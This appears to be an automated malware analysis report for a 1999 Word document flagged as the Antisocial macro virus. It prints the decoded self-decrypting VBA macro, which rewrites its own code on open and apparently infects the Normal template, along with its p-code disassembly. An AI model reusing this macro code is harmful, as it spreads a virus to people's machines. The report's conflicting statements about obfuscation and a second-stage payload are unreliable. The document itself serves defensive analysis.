Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8401b6567e466898…

MALICIOUS

Office (OLE)

Size: 45.0 KB
Created: 1999-08-06 18:44:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 03f5ae7adb62451c7e829d67bc16d3b7
SHA-1: 58c7ded28864c1f2bca32a56c88ab89b1781b174
SHA-256: 8401b6567e46689821c4879bab87aee72b7288a35c70c7619d371f119f0aa5c4
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro that runs automatically when the document is opened, a common technique in malicious documents. The macro code is heavily obfuscated, which makes the exact payload difficult to determine, but it is designed to execute arbitrary code. This suggests the document is a malicious attachment intended to deliver second-stage malware.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4656 bytes
SHA-256: 2554fed459dbb7867468640550d1644817bece7964834677eeb6a29e0ea3f930
Detection
ClamAV: Doc.Trojan.Antisocial-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
For d = 6 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6
'5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800
'1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%
'7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5YlwshjlSpul'k3').)'-'m'-'HA'Ul {'k
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'6GJ4JkrkzkRotky&72&GJ4Iu{tzUlRotky@&GJ4GjjLxusYzxotm&SI
'1OU/EfmfufMjoft!2-!OU/DpvouPgMjoft;!OU/BeeGspnTusjoh!ND
'4EgxmziHsgyqirx2WeziEw$JmpiReqi>AEgxmziHsgyqirx2JyppReqi>$Irh$Wyf
'7.[ol'Kltvyhsp�h{pvu'Vm'[ol'Kltlhu
'7.[l|mspzjo']vu'S€z'Rv}pjR

' Processing file: /opt/analyzer/scan_staging/b0938e1c96f242e580b132dd1aaae66c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13703 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #1:
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #2:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #3:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #4:
' 	Ld d 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndSub 
' Line #5:
' 	QuoteRem 0x0000 0x003B "6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6"
' Line #6:
' 	QuoteRem 0x0000 0x003C "5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5"
' Line #7:
' 	QuoteRem 0x0000 0x0040 "5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #8:
' 	QuoteRem 0x0000 0x0042 "3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #9:
' 	QuoteRem 0x0000 0x0042 "3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #10:
' 	QuoteRem 0x0000 0x003C "7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800"
' Line #11:
' 	QuoteRem 0x0000 0x0069 "1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%"
' Line #12:
' 	QuoteRem 0x0000 0x005A "7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5
... (truncated)